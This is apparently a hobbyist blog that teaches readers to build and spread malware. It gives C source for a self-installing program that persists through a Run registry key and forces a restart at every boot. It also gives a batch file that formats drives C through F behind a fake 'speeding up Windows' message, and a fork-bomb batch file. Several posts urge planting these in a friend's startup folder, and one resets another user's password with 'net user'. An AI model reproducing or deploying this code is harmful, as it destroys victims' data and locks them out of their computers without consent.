Sunday, November 2

6. Virus who shutdown the computer at every start up

In this segment I will tell you to create a virus
which shut down the computer at every start up and hence in this manner
user will not be able to operate any computer..

I have written this program in the C program
the source code of this program is this::

#include
#include
#include

int found,drive_no;
char buff[128];

void findroot()
{
int done;
struct ffblk ffblk;//File block structure
done=findfirst("C:\\windows\\system",&ffblk,FA_DIREC); //to determine the root drive
if(done==0)
{
done=findfirst("C:\\windows\\system\\sysres.exe",&ffblk,0); //to determine whether the virus is already installed or not
if(done==0)
{
found=1; //means that the system is already infected
return;
}
drive_no=1;
return;
}

done=findfirst("D:\\windows\\system",&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst("D:\\windows\\system\\sysres.exe",&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=2;
return;
}

done=findfirst("E:\\windows\\system",&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst("E:\\windows\\system\\sysres.exe",&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=3;
return;
}

done=findfirst("F:\\windows\\system",&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst("F:\\windows\\system\\sysres.exe",&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=4;
return;
}
else
exit(0);

}

void main()
{
FILE *self,*target;
findroot();
if(found==0) //if the system is not already infected
{
self=fopen(_argv[0],"rb"); //The virus file open's itself
switch(drive_no)
{
case 1:
target=fopen("C:\\windows\\system\\sysres.exe","wb");//to place a copy of itself in a remote place
system("REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run \/v sres \/t REG_SZ \/d C:\\windows\\system\\sysres.exe");//put this file to registry for starup
break;
case 2:
target=fopen("D:\\windows\\system\\sysres.exe","wb");
system("REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run \/v sres \/t REG_SZ \/d D:\\windows\\system\\sysres.exe");
break;
case 3:
target=fopen("E:\\windows\\system\\sysres.exe","wb");
system("REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run \/v sres \/t REG_SZ \/d E:\\windows\\system\\sysres.exe");
break;
case 4:
target=fopen("F:\\windows\\system\\sysres.exe","wb");
system("REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run \/v sres \/t REG_SZ \/d F:\\windows\\system\\sysres.exe");
break;
default:
exit(0);
}
while(fread(buff,1,1,self)>0)
fwrite(buff,1,1,target);
fcloseall();
}
else
system("shutdown -r -t 0");//if the system is already infected then just give a command to restart
}




:::::::::::
For this, the virus need to be doubleclicked only once and from then onwards it will carry out rest of the operations.And one more thing,none of the antivirus softwares detect's this as a virus.I have coded this virus in C.So if you are familiar with C language then it's too easy to understand the logic behind the coding.

Friday, October 31

5. Changing XP password without knowing current password





In this Section we will learn to change any user's password without knowing his current password.
Bcoz when you will change his password you will be asked his current password.

1. Open MS-DOS by Start>Run>type cmd>enter
2. In dos type command [net user kevin *]

in this command kevin is the user name
Instead of kevin you will type your username

3. now enter
4. you will get like this "Enter your password"
5. Type the password you wanna to give

NOTE::: password will be invisibily typed

Monday, October 27

4. How to make Hard disk eraser virus






Hackers generally make some viruses for there use, I will teach u, how to make deadly viruses, but every big thing starts from a little step. So, today i have a simple computer hard disk formatter virus for u.

1. Go to Run and type [notepad] and enter Start>Run>notepad>enter

2. now in the notepad type or copy/paste following codes:::

@echo off

echo ********************************************
echo WINDOW IS ARRANGING ITS FILE
echo SO IT CAN GAIN ITS SPEED AND PERFORMANCE
echo ********************************************
echo SO, PLEASE WAIT...............
echo ********************************************
format c: /y
cls

echo ********************************************
echo WINDOW IS ARRANGING ITS FILE
echo SO IT CAN GAIN ITS SPEED AND PERFORMANCE
echo ********************************************
echo SO, PLEASE WAIT...............
echo ********************************************
format d: /y
cls

echo ********************************************
echo WINDOW IS ARRANGING ITS FILE
echo SO IT CAN GAIN ITS SPEED AND PERFORMANCE
echo ********************************************
echo SO, PLEASE WAIT...............
echo ********************************************
format e: /y
cls

echo ********************************************
echo WINDOW IS ARRANGING ITS FILE
echo SO IT CAN GAIN ITS SPEED AND PERFORMANCE
echo ********************************************
echo SO, PLEASE WAIT...............
echo ********************************************
format f: /y

exit


3. Now save as I am saying click on File menu>Save As>
4. Give a file name asd.bat

5. this file wherever you have saved click on that once and see what happens

So, this is the computer hard disk formatter virus
this will format your all drives except in which operating system exists
if u want to infect your friend's computer with this virus
then paste this virus to start up folder which you will got in
Start>program>start up

Paste this virus in your friend's computer
then this virus never let him work on his computer.............

Sunday, October 26

3. HOW TO MAKE A COMPUTER CRASHING VIRUS





Hackers generally make some viruses for there use, I will teach u, how to make deadly viruses, but every big thing starts from a little step. So, today i have a simple computer hanging virus for u.

1. Go to Run and type [notepad] and enter Start>Run>notepad>enter

2. now in the notepad type the following codes:::
start a.bat
a.bat


3. Now save as I am saying click on File menu>Save As>
4. Give a file name a.bat

5. this file wherever you have saved click on that once and see what happens

So, this is the computer crashing virus
if u want to infect your friend's computer with this virus
then paste this virus to start up folder which you will got in
Start>program>start up

Paste this virus in your friend's computer
then this virus never let him work on his computer.............

Friday, October 24

2. START BUTTON HACKING OR FASTENER



Start Button Hacking or fastening the start submenu opening


In this session you will learn how to hack start button through registry editing

1. Go to run and type [regedit] >enter Start>Run>regedit


Now YOu will get the open pop up window of the Registry editor as i have shown in figure
now from up you will see second folder named HKEY_CURRENT_USER

2. click on [HKEY_CURRENT_USER]

a long menu will be opened in which you have to choose Desktop folder

3. click on [Desktop]
4. now click on [MenuShowDelay] >Enter

YOu will get a small window named Edit String
5. Change its value from [400] to [0] as in figure i did
6. Now restart the window


Now test Start button its submenu will be very fast open than before
or check another computer how slow they are than yours

1. How to trace any I.P. Address





In this Week's Blog
I m going to tell you Trace any I.p. address or url and u can know even where his server is and how u reach to that site through your I.P. Address


1. Type [cmd] in Run e.g. Start>Run>cmd
2. Enter
3. Type [tracert www.yoururl.com]

It will show first ur I.P. address and Your segments and then your lan providers I.P.
and at last you will get ur url I.P. address

4. Now Watch last I.P. Address (your url's I.P. Address)
5. Now open Internet Explorer and in address bar type [www.whatismyipaddress.com]
6. Now this site will open where in the option [Look up I.P. address]
7. Type the last I.P. Address(your site) in column
8. In the google map which will made slightly downward give the real server address and its location in the world map.